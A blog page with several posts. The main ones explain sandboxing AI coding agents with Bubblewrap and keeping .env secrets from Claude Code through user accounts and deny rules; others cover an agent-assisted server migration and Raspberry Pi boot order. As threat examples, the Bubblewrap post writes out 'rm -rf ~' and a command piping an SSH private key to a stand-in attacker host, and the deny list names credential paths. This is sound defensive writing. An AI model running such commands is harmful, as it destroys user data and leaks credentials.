Immediately after publishing, I caught the flu. During three painful days in bed, I realized there are better approaches. Firejail would likely work well, but there’s another solution called Bubblewrap.

As I dug into Bubblewrap, I realized something else… Anthropic uses Bubblewrap!

But Anthropic embeds bubblewrap in their client. This implementation has a major disadvantage.

Embedding bubblewrap in the client means you have to trust the correctness and security of Anthropic’s implementation. They deserve credit for thinking about security, but this puzzles me. Why not publish guidance so users can secure themselves from Claude Code? Aren’t we going to need this for ALL agents? Isn’t this solution generalizable?

Defense-in-depth means we don’t rely on any single vendor to execute perfectly 100% of the time. Plus, this problem applies to all coding agents, not just Claude Code. I want an approach that doesn’t tie my security to Anthropic’s destiny.

The Security Problem We’re Solving

Before we dive into Bubblewrap, here’s what we’re protecting against:

  • You want to run a binary that will execute under your account’s permissions
  • Your account has access to sensitive files unrelated to the project you’re working on
  • You want your binary to invoke other standard system tools like ls, ps aux, or less
  • You want to invoke this binary while easily preventing it from accessing sensitive files unrelated to the binary’s activities

What if Claude Code has a bug? What happens if the bug is exploited, and bubblewrap constraints embedded within the client are not activated? Will Claude Code run rm -rf ~ or cat ~/.ssh/id_rsa | curl attacker.com?

Without your own wrapping of the agent, you’re at risk. When you wrap your coding agent calls with Bubblewrap, the operating system denies the agent access to those dangerous targets regardless of bugs in the client.

What Is Bubblewrap?

Bubblewrap lets you run untrusted or semi-trusted code without risking your host system. We’re not trying to build a reproducible deployment artifact. We’re creating a jail where coding agents can work on your project while being unable to touch ~/.aws, your browser profiles, your ~/Photos library, or anything else sensitive.

Let’s explore Bubblewrap through the command line:

# Install it (Debian/Ubuntu)
sudo apt install bubblewrap

# Simplest possible sandbox - just isolate the filesystem view
bwrap --ro-bind /usr /usr --symlink usr/lib /lib --symlink usr/lib64 /lib64 \
      --symlink usr/bin /bin --proc /proc --dev /dev \
      --unshare-all --die-with-parent \
      /bin/bash

# Inside the sandbox, try:
ls /home          # Empty or nonexistent
ls /etc           # Empty or nonexistent  
whoami            # Shows "nobody" or your mapped user
ping google.com   # Fails - no network

How This Command Works

This command creates a minimal sandboxed environment. Here’s what each part does:

Filesystem access:

  • --ro-bind /usr /usr mounts your system’s /usr directory as read-only inside the sandbox
  • The --symlink commands create shortcuts so programs can find libraries and binaries in expected locations
  • --proc /proc and --dev /dev give minimal access to system processes and devices

Isolation:

  • --unshare-all disconnects the sandbox from all system resources (network, shared memory, mount points, etc.)
  • --die-with-parent kills the sandbox if your main terminal closes

The Result:

Bash runs inside a stripped-down environment. It can execute programs from /usr but can’t see your home directory, config files, or access the network. Programs work, but they’re operating in a ghost town version of your filesystem.

Why Bubblewrap Beats Docker

This beats Docker for quick workflows. Docker requires a running daemon and lots of configuration files. Bubblewrap lets you execute your app directly—no daemon, no stale containers cluttering your system.

If you’re experienced enough to worry about Docker misconfigurations, Bubblewrap gives you more control when you need it. You just run a command. No YAML files or debugging background services.

Quick Start: Running Claude Code with Bubblewrap

A big part of the reason for needing this is --dangerously-skip-permissions. There are times when it’s very useful to give an agent autonomy in designing, experimenting & implementing systems. Last week, I built a wifi access point that hosts a Quakeworld server and vends WebAssembly Quake clients. It’s an instant LAN party in a box. I did this unattended and it works. --dangerously-skip-permissions is very powerful, assuming you know how to aim it safely.

Here’s how I run Claude Code with --dangerously-skip-permissions inside a Bubblewrap sandbox:

PROJECT_DIR="$HOME/Development/YourProject"
bwrap \
     --ro-bind /usr /usr \
     --ro-bind /lib /lib \
     --ro-bind /lib64 /lib64 \
     --ro-bind /bin /bin \
     --ro-bind /etc/resolv.conf /etc/resolv.conf \
     --ro-bind /etc/hosts /etc/hosts \
     --ro-bind /etc/ssl /etc/ssl \
     --ro-bind /etc/passwd /etc/passwd \
     --ro-bind /etc/group /etc/group \
     --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
     --ro-bind "$HOME/.nvm" "$HOME/.nvm" \
     --bind "$PROJECT_DIR" "$PROJECT_DIR" \
     --bind "$HOME/.claude" "$HOME/.claude" \
     --tmpfs /tmp \
     --proc /proc \
     --dev /dev \
     --share-net \
     --unshare-pid \
     --die-with-parent \
     --chdir "$PROJECT_DIR" \
     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \
     "$(command -v claude)" --dangerously-skip-permissions "Please review Planning/ReportingEnhancementPlan.md"

Key Configuration Lines:

# Required for Claude Code to work
--ro-bind "$HOME/.nvm" "$HOME/.nvm" \

# Claude stores auth here. Without this, you'll re-login every time
--bind "$HOME/.claude" "$HOME/.claude" \

# Only add if you understand why you need SSH access
# --ro-bind "$HOME/.ssh" "$HOME/.ssh" \

# Block access to your .env files by overlaying them with empty files
# (you need to know the exact paths of the files you're masking)
--ro-bind /dev/null "$PROJECT_DIR/.env" \
--ro-bind /dev/null "$PROJECT_DIR/.env.local" \
--ro-bind /dev/null "$PROJECT_DIR/.env.production" \

Important: Most people don’t need the SSH line. It gives your agent the ability to SSH into systems where you’ve copied a public key. If you don’t understand the utility, don’t add it.
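Enumerating every .env variant by hand is error-prone. Here's a hypothetical helper, not from the original setup, that finds .env-style files under the project and prints the matching --ro-bind /dev/null overlay for each. It assumes paths contain no whitespace, since the output gets spliced into a command line by word-splitting:

```shell
#!/bin/sh
# Hypothetical helper: emit a "--ro-bind /dev/null <path>" overlay for
# every .env-style file in the project, so secrets files are masked
# without listing them by hand. Assumes paths contain no whitespace.
PROJECT_DIR="${PROJECT_DIR:-$PWD}"

env_overlays() {
  # -name '.env*' catches .env, .env.local, .env.production, etc.
  find "$PROJECT_DIR" -type f -name '.env*' | while read -r f; do
    printf '%s %s %s\n' --ro-bind /dev/null "$f"
  done
}

env_overlays
# Splice the output into the sandbox invocation, e.g.:
#   bwrap $(env_overlays) ... "$(command -v claude)" --dangerously-skip-permissions
```

Review the printed list before trusting it; a .env file the find pattern misses stays readable.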

Why Not a Dedicated User Account?

My previous post proposed creating a custom user account for Claude on the host OS. This approach has three major problems:

1. ACL Tuning Becomes a Usability Nightmare

You’ll fight with file permissions constantly. You need to tune Access Control Lists to prevent access to sensitive .env files. This type of friction has killed security initiatives for decades. Security dies on usability hills.

I came up with that approach while getting sick with the flu. Please accept my apologies.

2. No Network Connectivity Restrictions

A custom account doesn’t solve the network access problem. Claude agents can spin up sockets and connect to whatever they want. Unless you run UFW and restrict outbound connectivity from your host, you risk your agent exfiltrating content.

I’ve been creating agents that remotely administer and tune servers. It’s not responsible to let agents have source:any destination:any access to your network or the Internet. One wrong prompt puts you at risk of data exfiltration. My previous solution was incomplete.
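For completeness: host-level egress filtering for a dedicated agent account is possible with iptables' owner match. The sketch below is my own illustration, not part of the original guide; the account name is hypothetical, and the rules are printed for review rather than applied (applying them requires root and the owner match module):

```shell
#!/bin/sh
# Sketch only: egress rules for a hypothetical dedicated "claude" account
# using iptables' owner match. Printed for review, not applied.
USER_NAME="claude"   # hypothetical dedicated agent account

RULES=$(cat <<EOF
# Allow DNS and HTTPS for the agent account, reject everything else it sends:
iptables -A OUTPUT -m owner --uid-owner $USER_NAME -p udp --dport 53 -j ACCEPT
iptables -A OUTPUT -m owner --uid-owner $USER_NAME -p tcp --dport 443 -j ACCEPT
iptables -A OUTPUT -m owner --uid-owner $USER_NAME -j REJECT
EOF
)
printf '%s\n' "$RULES"
```

Even this only limits which ports the agent can use, not where it can connect; HTTPS to an attacker’s server still looks like HTTPS.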

3. Docker Is the Wrong Tool

Docker solves the “it works on my machine” problem when moving code from your laptop to production servers. But most people aren’t deploying frequently enough to maintain strong Docker skills.

Setting up filesystems and networking in containers takes mental effort. If you just want to run a command safely, you shouldn’t need to install and configure a background service. People want something that works quickly without the cognitive overhead.

Why Use Your Own Bubblewrap Instead of Anthropic’s Sandbox?

Everyone makes security mistakes eventually. Claude Code is potentially dangerous. Which approach is safer?

Trust Anthropic: Hope their team never makes an implementation mistake that breaks security controls.

or

Don’t Trust Anthropic: Implement your own access controls in the operating system that constrain the binary at runtime.

There is one other big reason you should know how to leverage Bubblewrap. You need a solution for sandboxing agents that aren’t Claude Code.

Agents should never be considered trustworthy. Even when they have security controls. Put controls around them—don’t rely on agents built with models that have experienced misalignment.

A comparison of what you’re trusting: user-wrapped invocation of Bubblewrap versus Bubblewrap embedded in a client

Running Bubblewrap Yourself:

  • The Linux kernel’s namespace implementation
  • The Bubblewrap binary (small, auditable codebase)
  • Your own configuration (you wrote it, you understand it)
  • Your own proxy/filtering code

Using Anthropic’s Sandbox Runtime:

  • Everything above, plus:
  • Anthropic’s wrapper code and configuration choices
  • Anthropic’s filtering proxy implementation
  • Anthropic’s update/distribution mechanism (npm)
  • That Anthropic’s security interests align with yours

The Trust Matrix

Trust isn’t binary—it’s about understanding what you’re trusting and why. Here’s a quick comparison:

Threat | DIY bwrap | Anthropic SRT
Claude accidentally running rm -rf ~ | ✓ Protected | ✓ Protected
Claude exfiltrating ~/.ssh | ✓ Protected | ✓ Protected
Supply chain attack via npm | ✓ Not exposed | ✗ Exposed
Subtle misconfiguration | ✗ Your risk | ✓ Their expertise
Agent telemetry you don’t want sent | ✓ You control | ? Their choice
Novel bypass techniques | ✗ You’re on your own | ✓ Their team watches

So in Anthropic’s defense: this is not cut-and-dried. Most companies don’t have the resources for great security teams. You have to decide whether you can own this. Many companies will be wise to rely on Anthropic’s expertise; their reputation is on the line if someone breaks their sandbox implementation. But you’re going to be locked into Anthropic’s security model if you don’t learn how to wield Bubblewrap. Pivoting to a new agent will require figuring out security there. Why not just rip the band-aid off and learn Bubblewrap?

Don’t trust me either!

This has been a fun writeup on trusting trust. TRUST ME!

But you shouldn’t trust me! I might be a dog on the Internet. Maybe I’m AI slop?!

Here is some code you can use to test the bwrap container I provided for my Claude usage. Note that this is invoked differently: we’re not going to call claude, we’re going to call bash and pass it the test script. My test script is available here:

All you need to do is create a YourProject folder in your $HOME/Development directory. Then create a sandbox-escape-test.sh in there. Fill it with the test code from my GitHub.

Read and understand what the script does before executing it. This post is already pretty long 😀

Wrapping Up

I’m building with many agents—not just Claude Code. I need a generalized solution for sandboxing that I can apply to other agents.

Anthropic deserves attention and credit for the constraints they’re giving you. I wish they had published them in a way that doesn’t tie your security destiny to their ability to execute correctly 100% of the time.

The choice is yours: trust a vendor’s implementation, or take control of your own security boundaries. Both are valid. I might be paranoid. Are you feeling lucky?

p.s. If I ever get run over by a flaming pizza truck, here’s a handy 1 liner:

claude "Act as a security expert with a specialization in Linux system security.  Help me generate a bubblewrap script for safely invoking coding agents so they do not have access to sensitive data on my file system and appropriately manage other security risks, even though they're going to be invoked under my account's permissions.  Let's talk through everything that the agent should be able to do & access first, and then generate an appropriate bwrap script for delivering that capability.  Then let's discuss what access we should restrict."

Need help on topics related to this? I’m currently freelance! Let’s connect and build secure things at incredibly high speed:

https://www.linkedin.com/in/patrickmccanna

Keeping secrets from Claude Code

How to keep your .env files safe from AI coding assistants

UPDATE: This post blew up! But I discovered a FAR SUPERIOR approach. You still might like this! But bubblewrap is faster and more flexible.

https://patrickmccanna.net/a-better-way-to-limit-claude-code-and-other-coding-agents-access-to-secrets/


Someone posted online:

“I like how Claude Code casually reads my .env file.”

This is an accurate assessment of Claude Code. Claude Code reads .env files by default. It loads your API keys, database passwords and tokens into memory without asking.

Is this unappealing to you? Here’s how to manage that risk.

The Problem

Claude Code can read .env files automatically. If you run it without --dangerously-skip-permissions, it will normally ask permission for access. But what if Claude stops acting normally?

Should the secrecy of your file rely on a system that prevents access only until you type the word ‘yes’?

How is it possible that Claude Code can’t access the file sometimes, and other times it can?

It’s possible because you’re logged in and running claude under your user account. Claude has all the permissions it needs to masquerade as you! Claude always had access to the file! It’s just being polite. The politeness of LLMs cannot be relied upon. When you run claude this way, any file accessible by you is accessible by claude.

Claude Code is not supposed to break out of the current working directory. But what technical constraints prevent it? If you run Claude under your account, there’s no Linux/macOS control that prevents it from reaching the photos and docs you have access to.

You’re trusting Claude to be polite and behave the way you expect.

If you invoke Claude (or any coding agent) under your user account, you’re trusting trust. Don’t despair! Here’s how to run Claude when you’re working on systems that demand safety.

The First Defense: A Separate User

Give Claude its own identity. Create the ‘Claude’ Group and User accounts.

On Linux:

# Create a group for Claude
sudo groupadd claude

# Create a user with no home directory privileges beyond basics
sudo useradd -m -g claude -s /bin/bash claude

# Set a password (you’ll need it for sudo later)
sudo passwd claude

On macOS:

# Create a group (find an unused GID first)
sudo dscl . -create /Groups/claude
sudo dscl . -create /Groups/claude PrimaryGroupID 400

# Create the user
sudo dscl . -create /Users/claude
sudo dscl . -create /Users/claude PrimaryGroupID 400
sudo dscl . -create /Users/claude UserShell /bin/bash
sudo dscl . -create /Users/claude NFSHomeDirectory /Users/claude
sudo dscl . -create /Users/claude UniqueID 400

# Create home directory and set ownership
sudo mkdir -p /Users/claude
sudo chown claude:claude /Users/claude

# Set password
sudo passwd claude

The claude user now exists. Run Claude as its own user and keep the secrets files outside the claude user’s permissions.

Lock Down Your .env Files

Your secrets need permissions that exclude the claude user.

# Navigate to your project
cd /path/to/your/project

# Set ownership to yourself
chown $(whoami):$(whoami) .env

# Remove all permissions for group and others:
# owner can read and write, everyone else gets nothing

chmod 600 .env

The 600 permission means only you can read the file. The claude user belongs to a different group.

For extra certainty, explicitly deny the claude group:

# make sure .env is owned by your primary group

chown $(whoami):$(id -gn) .env
chmod 640 .env

Verify your work:

ls -la .env

You should see something like -rw------- or -rw-r-----. The important part: no permissions on the right side for “others.”
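You can script this check. The helper below is my own sketch, not from the original post: it inspects the octal mode and warns unless it is 600 or 640 (it tries the GNU stat flag first, then the BSD/macOS one):

```shell
#!/bin/sh
# Sketch: warn if a secrets file is readable beyond owner (600) or
# owner+group (640). Tries GNU stat, then falls back to BSD/macOS stat.
check_env_perms() {
  if [ ! -e "$1" ]; then
    echo "WARNING: $1 does not exist"
    return 1
  fi
  mode=$(stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1")
  case "$mode" in
    600|640) echo "OK: $1 is mode $mode" ;;
    *)       echo "WARNING: $1 is mode $mode (others may have access)" ;;
  esac
}

# Usage:
#   check_env_perms .env
```

Dropping a call like this into a pre-commit hook or shell profile makes the permission check routine instead of something you remember once.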

Run Claude under the Claude user account

Become claude! Claude Code now runs with the claude user’s permissions. Your secrets remain invisible to the claude user because you’ve removed its access to the .env file.

# Switch to claude user and run Claude Code

sudo -u claude claude

That’s it. sudo -u claude runs the command that follows as the claude user. Claude Code launches. If it tries to read your .env file, it’ll get a permissions denied error it can’t overcome.

For convenience, create an alias:

# Add to your .bashrc or .zshrc
alias claudecode='sudo -u claude claude'

Now you type claudecode and everything’s safe.

Summarizing:

# One-time setup (Linux)
sudo groupadd claude
sudo useradd -m -g claude -s /bin/bash claude
sudo passwd claude

# Per-project setup
cd /your/project
chown $(whoami):$(whoami) .env
chmod 600 .env

# Daily usage
sudo -u claude claude

  • Create a dedicated user for claude
  • Set file permissions that exclude the claude user from access to sensitive files
  • Invoke claude with sudo -u claude and let the OS enforce boundaries

The claude user can read your source code. It can write to project directories if you grant that access. But it cannot touch files owned by you with restrictive permissions. The operating system enforces this.

In the next section, I’ll summarize Anthropic’s stated controls. When you go this route, you’re trusting Anthropic to not only respect your wishes, but to write code so secure that it always and only does what they intend. All software has mistakes, even Anthropic’s. Buyer beware.

I include this next section out of respect for Anthropic- but my judgement is that using the following approach will eventually bite you in the butt.


The Second Defense: Deny Rules

Claude has mechanisms for restricting access. You’re trusting Anthropic to do the right thing correctly all the time. Anthropic has published mechanisms for telling Claude Code what it cannot touch. Do this before you write your first line of code. The configuration lives in ~/.claude/settings.json.

Create the file. Add these rules:

{ "permissions": 
    { "deny": [ 
        "Read(**/.env*)", 
        "Read(**/secrets/**)", 
        "Read(**/*credentials*)", 
        "Read(**/*secret*)", 
        "Read(~/.ssh/**)", 
        "Read(~/.aws/**)", 
        "Read(~/.kube/**)" ] 
    } }

The double asterisks catch nested directories. They catch the .env.local file you forgot you had.

Test your rules. Ask Claude Code to read your .env file. It should fail. If it reads the file anyway, something is wrong. Fix it before you continue.

The Anthropic access controls are like putting a lock on your door: it keeps honest people honest. Locks can be picked. AI assistants can be influenced into circumventing their own controls.


An alternative approach: Containers

Containers are an approach for protecting secrets.

Run Claude Code inside a Docker container or a virtual machine. Give it access only to what it needs. The container is a sandbox the AI plays within. Your secrets stay outside the container. Let Claude build the thing; it can have its own internal .env files, but for production you use different secrets.

Configure your container with read-only volumes for code. Mount nothing sensitive.

The AI agent can see project files in your container. It cannot see your home directory. It cannot see your SSH keys. It can’t probe through the Photos library in your home directory.

This approach follows the principle of least privilege. Grant minimum access required. Assume the worst.
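As a sketch of what that looks like, here's a least-privilege docker run command built as a string and printed for review. The image name and the /work mount point are placeholders I chose for illustration; the :ro suffix makes the code mount read-only inside the container:

```shell
#!/bin/sh
# Sketch of a least-privilege container invocation. Image name and mount
# point are placeholders; :ro makes the code mount read-only. Printed
# for review rather than executed.
PROJECT_DIR="${PROJECT_DIR:-$PWD}"

DOCKER_CMD="docker run --rm -it -v $PROJECT_DIR:/work:ro -w /work node:20-slim /bin/bash"
printf '%s\n' "$DOCKER_CMD"
```

Nothing outside $PROJECT_DIR is mounted, so the container simply has no path to your home directory or SSH keys.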

My advice: Use operating system permissions, user accounts and groups

Leveraging operating system access controls is defense in depth. Deny rules can be misconfigured. Vault integrations can fail. But Unix permissions have guarded secrets for a long time. You have to decide which risk is more probable: kernel exploits that circumvent ACLs, or prompt engineering that pushes the agent to access secrets. I’m going to put my resources into ACLs and good OS hygiene. These approaches don’t get distracted by clever prompts.

The Truth About AI Security

There is no going back. Claude is insanely useful. Coding agents write code faster than you can. They explain concepts clearly.

Coding agents are also prone to probabilistic outbursts. If you need to keep secrets, use deterministic operating system access controls to prevent access.

Using custom AI Agents to Migrate Self-Hosted Services Between Servers

Migrations are hard.

I ran into an infrastructure challenge during my IoT development. A Raspberry Pi 5 (kbr server) ran three self-hosted services—Planka (Kanban boards), Ghost (blog), and Homer (dashboard). I needed to migrate them to a more powerful server running AMD Ryzen hardware. This would free my dev box up to experiment with new features in my Kanban/Blog/Reporting (KBR) tool.

The server I want to migrate to is already hosting critical AI services (Ollama, Open WebUI, and n8n). I do not want them disrupted during the migration.

Both systems used Cloudflare Tunnels for secure external access, Docker for containerization. They each had existing Ansible playbooks for deployment and backup. I wanted to:

  • Fully migrate production services from a Pi to the new server
  • Preserve all data (posts, drafts, images, kanban cards, attachments)
  • Keep existing AI services running untouched
  • Convert the old Pi into a development environment
  • Execute a clean DNS cutover with minimal downtime

The big problem is the limitations of my own brain. As I’ve been doing more AI supported development, the pace of my achievements is making it hard for me to maintain awareness of how everything is configured. I built this system months ago. My memory of how to backup and rebuild everything has faded. I had playbooks for building, but migrating existing data to a new deployment is a different beast.

Discovery Phase: Understanding Both Systems

I needed to deeply understand both systems to build a migration plan. I overcame my gaps in memory about how everything works by creating & using automated exploration agents to gather comprehensive information about each system’s architecture and deployed software.

For this project, the general design of my agents included:

  • An objective
  • Seven phases of migration activities
  • Clear expectations around safety and best practices, with defined success conditions

My Agents have the following set of objectives:

You are a system analysis agent. Your task is to:
1. Review historical knowledge from previous agents
2. Analyze the project codebase to understand the intended system architecture
3. Connect to the running deployment and gather actual system state
4. Compare expected vs actual state
5. Produce a structured summary for troubleshooting purposes
6. Update knowledge repositories with discoveries
7. Create an Operations.md file in the Operations directory of the project if it doesn't exist.  

At a top level, the phases include:

Phase 0: Knowledge Base Review
Phase 1: Repository Structure Analysis
Phase 3: Live System Discovery
Phase 4: Analysis & Comparison
Phase 5: Context Documentation & Knowledge Updates
Phase 6: Operations Documentation
Phase 7: Final Deliverable

The general gist of the above is:

First, the agent searches a knowledge base of previous agent troubleshooting sessions that captured problems that were discovered and corrected. This reduces the need for redundant troubleshooting across different sessions, and it helps manage my token budget for the work.

Next, the agent looks into the code that generates the project to understand what’s supposed to be on the target system.

Then the agent looks into a live system to understand what’s actually on the systems (either due to configuration drift or some other change).

When that’s complete, we go munge everything we have into an operations document. This becomes my operations report.

Source System (kbr server) Discovery

The exploration agent showed:

  • 6 containerized services: Planka, Ghost, Homer, PostgreSQL, MySQL, and Nginx
  • 7 Docker volumes requiring backup (database data, attachments, content, avatars, etc.)
  • Cloudflare tunnel routing traffic for kanban.url, blog.url, and reports.url
  • Existing Ansible playbooks for backup and restore operations
  • Well-documented architecture in markdown files

Target System (ai server) Discovery

The agent found that the server I want to migrate to had:

  • Existing protected services: Ollama (LLM inference), Open WebUI (chat interface), n8n (workflow automation)
  • A Reserved ports list
  • A Storage constraint: /home partition at 75% capacity—I had to put new services in /opt/
  • Available resources: 650GB disk space in /opt/, 25GB+ RAM available
  • Active Cloudflare tunnel for my AI endpoint that I had to keep untouched

Validating Backup Procedures

I validated that the deployed backup scripts followed official documentation. I’ve found that the agents sometimes try to invent their own backup strategies. They can work, but they also break future updates. Next I fetched the official backup guides for both Ghost and Planka, then had the agent compare them against the existing backup_kbr.sh script.

The existing backup script matched all requirements and exceeded them with additional safeguards like SHA256 checksums and comprehensive manifests.

Planning Phase: Building a 10-Phase Migration Plan

I built a comprehensive migration plan through iterative review with the agent. I discussed, refined, and enhanced each phase based on operational concerns.

The 10 Phases

Phase | Purpose
1. Pre-Migration Preparation | Verify prerequisites, create rollback points
2. Data Quality Assessment | Generate backup, verify integrity, record baseline counts
3. Prepare ai server | Create directory structure, Docker Compose stack
4. Data Transfer | rsync backup to target, restore databases and volumes
5. Testing (QA/QC) | Local testing, data verification, create Ghost API key
6. Staging DNS | Add temporary *bak DNS names to ai server tunnel
7. Staging Validation | External testing, write tests, Go/No-Go checkpoint
8. Reconfigure kbr server | Convert to dev environment with *-dev DNS names
9. DNS Cutover | Switch production names to ai server
10. Cleanup | Remove staging DNS, update Homer links, set up monitoring

Key Planning Decisions

DNS Strategy: I implemented a staged approach:

  • Current: Production names on kbr server
  • Staging: Temporary *bak names on ai server for testing
  • Final: Production names transferred to ai server
  • Dev: New *-dev names on kbr server for experimentation

Port Allocation: The agent selected ports that don’t conflict with existing services.

Storage Location: The agent put all migration files in /opt/kbr-migration/ to avoid the space-constrained /home partition.

Enhancements I Added During Review

Through iterative discussion, I enhanced the plan with:

  • Health check loops instead of arbitrary sleep commands for database readiness
  • rsync with progress instead of scp for large file transfers
  • Baseline counts table to verify I lost nothing (posts, drafts, images, cards, attachments)
  • Write tests to verify full functionality (create test post, create test card)
  • Go/No-Go checkpoints before major transitions
  • Rollback procedures with automatic restoration on failure
  • Ghost Content API key creation for the reporting dashboard
  • Homer URL updates since the migrated config still pointed to old URLs

Executing the Plan

Prerequisites

Before I started execution:

  • Obtain a Cloudflare API token with DNS edit permissions for the domain
  • Verify SSH access to both servers
  • Confirm Docker runs on both systems
  • Check available disk space in /opt/ on ai server

Execution Flow

Phases 1-2: Safe, Read-Only Operations

These phases don’t modify any running services. They create backups, verify data integrity, and establish baseline measurements. If anything looks wrong, I stop here—no harm done.

# Run the backup
cd /home/Development/Playbooks/SelfHosted_K_B_R
ansible-playbook -i inventory backup.yml

# Record baseline counts for later comparison
ssh account@kbr.server
docker exec ghost-db mysql -u ghost -p... ghost \
  -e "SELECT status, COUNT(*) FROM posts GROUP BY status;"

Phases 3-5: Target System Setup

I create the Docker infrastructure on ai server and restore the backup. I test locally before any DNS changes.

# Create directory structure
sudo mkdir -p /opt/kbr-migration
sudo chown account:account /opt/kbr-migration

# Transfer and extract backup
rsync -avh --progress backups/*.tar.gz account@ai.server:/opt/kbr-migration/

# Start databases with health checks
docker-compose up -d planka-db ghost-db
until docker exec kbr-planka-db pg_isready -U planka; do sleep 2; done

# Restore data
zcat databases/planka_db.sql.gz | docker exec -i kbr-planka-db psql -U planka -d planka

Phases 6-7: Staging Validation

I add temporary DNS names and test externally. This is the last safe checkpoint—production still runs on kbr server.

The Go/No-Go checkpoint requires all tests to pass:

  • All staging URLs accessible
  • Images and drafts verified
  • Test post/card creation works
  • Existing ai domain endpoint still functional
  • Baseline counts match
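The "baseline counts match" check can be mechanized with a plain diff. A minimal sketch, with made-up counts standing in for the real `SELECT status, COUNT(*)` output captured in Phase 2:

```shell
# Sketch: compare pre-migration baseline counts against post-migration counts.
# The rows below are placeholders for real query output saved to these files.
cat > /tmp/baseline_counts.txt <<'EOF'
draft 7
published 42
EOF
cat > /tmp/migrated_counts.txt <<'EOF'
draft 7
published 42
EOF

if diff -q /tmp/baseline_counts.txt /tmp/migrated_counts.txt >/dev/null; then
  echo "GO: baseline counts match"
else
  echo "NO-GO: counts differ" >&2
  diff /tmp/baseline_counts.txt /tmp/migrated_counts.txt >&2
fi
```

Sorting both files the same way before diffing keeps the comparison stable regardless of query ordering.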

Phases 8-9: The Cutover

This is where production switches. A brief window of unavailability exists between reconfiguring the kbr server and completing the DNS cutover on the ai server.

# On kbr server: Switch to dev names
# On ai server: Add production names to tunnel
cloudflared tunnel route dns <tunnel-id> kanban.myurl.io
cloudflared tunnel route dns <tunnel-id> blog.myurl.io
cloudflared tunnel route dns <tunnel-id> reports.myurl.io

Phase 10: Cleanup

I remove temporary staging DNS entries, update Homer dashboard links to point to production URLs, and set up automated backups and health monitoring.

Rollback Capabilities

The plan includes rollback procedures at multiple points:

  • Before Phase 8: Simply remove staging DNS from ai server; kbr server remains production
  • After Phase 9: Re-route production DNS back to kbr server, restore its original tunnel config

I backed up all cloudflared configs before modification, enabling quick restoration if needed.

Lessons Learned

What Made This Migration Plannable

  • Existing documentation: Both systems had Operations directories with current state information
  • Ansible playbooks: Existing backup/restore automation provided a foundation
  • Docker containerization: Clean separation of services made migration straightforward
  • Cloudflare Tunnels: DNS changes don’t require firewall modifications

Prompt Engineering Insights

The planning session revealed that infrastructure migration requests benefit from explicit upfront information:

  • Migration type (full migration vs. backup copy)
  • Post-migration role for source system
  • DNS naming constraints (Cloudflare doesn’t allow underscores)
  • Storage preferences on target system
  • Links to official backup documentation
  • Specific data verification requirements
  • Service dependencies (API keys, credentials)
  • Rollback expectations

A structured prompt template capturing these elements can reduce planning clarification cycles significantly.

Conclusion

Migrating self-hosted services between servers doesn’t have to be scary. I used agents to perform discovery, then executed this complex migration through a phased approach with staged DNS testing and clear rollback procedures.

The key principles:

  • Discover before planning: Understand the source and migration destination systems deeply
  • Validate backup procedures: Ensure they match official documentation
  • Stage before cutting over: Test with temporary DNS names first
  • Build in checkpoints: Go/No-Go decisions prevent premature transitions
  • Plan for rollback: Every change should be reversible
  • Verify with baseline counts: compare before and after

The Boot Order of the Raspberry Pi Is Unusual!

I discovered that the Raspberry Pi doesn’t boot the same way traditional PCs do. This was interesting and I thought I’d share.

At a high level, Raspberry Pi booting is firmware-driven, not BIOS-driven like a PC. On Raspberry Pi, the GPU (VideoCore) is powered first and is the root of trust for booting. The ARM CPU is not the initial execution environment. This is a deliberate architectural choice dating back to the original Pi.

Boot sequence (simplified):

1. Power applied

  • Power management IC brings up the power rails
  • VideoCore GPU comes up first
  • ARM CPU is held in reset

2. VideoCore ROM Executes (GPU Side)

  • Immutable GPU boot ROM runs
  • This code:
    • Initializes minimal SDRAM
    • Reads boot configuration
    • Locates next-stage bootloader

The ARM cores are still powered down.

3. GPU Loads Firmware

  • GPU reads EEPROM bootloader
  • EEPROM bootloader then loads firmware from SD / USB / Network

The loaded firmware files are GPU binaries, not ARM code!

  • start*.elf
  • fixup*.dat

4. GPU Configures the System

The GPU:

  • Parses config.txt
  • Applies device tree overlays
  • Allocates memory split (GPU vs ARM)
  • Initializes clocks and peripherals
  • Loads the ARM kernel image into RAM

At this point, the system hardware layout is defined by the GPU, not the CPU.
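Step 4 is the part users can see: config.txt. These are real config.txt directives (the values here are just examples), and they illustrate how much of the hardware layout the GPU firmware decides before the ARM core ever executes an instruction:

```
# /boot/firmware/config.txt - parsed by the VideoCore firmware, not by Linux
gpu_mem=128              # memory split: RAM reserved for the GPU
dtoverlay=vc4-kms-v3d    # device tree overlay applied before the kernel boots
arm_64bit=1              # tells the firmware to load a 64-bit kernel
kernel=kernel8.img       # which ARM kernel image the GPU loads into RAM
```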

5. GPU Releases the ARM CPU from Reset

Only after:

  • Firmware is loaded
  • Memory is mapped
  • Kernel is staged

…does the GPU release the ARM core(s) and set their entry point.

This is when the CPU first executes instructions.

6. ARM CPU Starts Linux

  • CPU jumps directly into:
    • kernel7.img / kernel8.img
  • Linux takes over
  • GPU becomes a peripheral (mailbox, display, VPU, etc.)

This explains several Raspberry Pi oddities:

  • The Raspberry Pi has no BIOS / UEFI
  • config.txt is not a Linux file
  • Kernel replacement is trivial
  • Boot failures before Linux is loaded are invisible to Linux

Even with the EEPROM bootloader:

  • The GPU still executes first
  • The EEPROM code is executed by the GPU
  • ARM remains gated until kernel handoff

EEPROM just replaces bootcode.bin; it does not change authority.

The trust chain for the Pi is:

GPU ROM → GPU firmware → ARM kernel → Linux userspace

The trust chain choices have consequences!

  • ARM cannot verify GPU firmware
  • Secure boot (where enabled) is GPU-anchored
  • This is why Raspberry Pi secure boot is not comparable to PC Secure Boot

The Raspberry Pi secure boot implementation ensures that:

  • Only cryptographically signed boot firmware and kernel images are executed
  • The chain of trust starts in the VideoCore GPU, not the ARM CPU
  • The system can be locked to a specific vendor or deployment

It does not:

  • Provide a hardware-enforced user/kernel trust boundary
  • Protect against a malicious or compromised GPU firmware
  • Provide measured boot or TPM-style attestation
  • Prevent runtime compromise of Linux

Here’s the order of operations for boot up on a traditional PC:

Traditional PC Boot:

  ┌─────────────┐
  │    BIOS     │
  │   (CPU)     │
  └──────┬──────┘
         ↓
  ┌─────────────┐
  │  Bootloader │
  │   (CPU)     │
  └──────┬──────┘
         ↓
  ┌─────────────┐
  │   Kernel    │
  │   (CPU)     │
  └─────────────┘

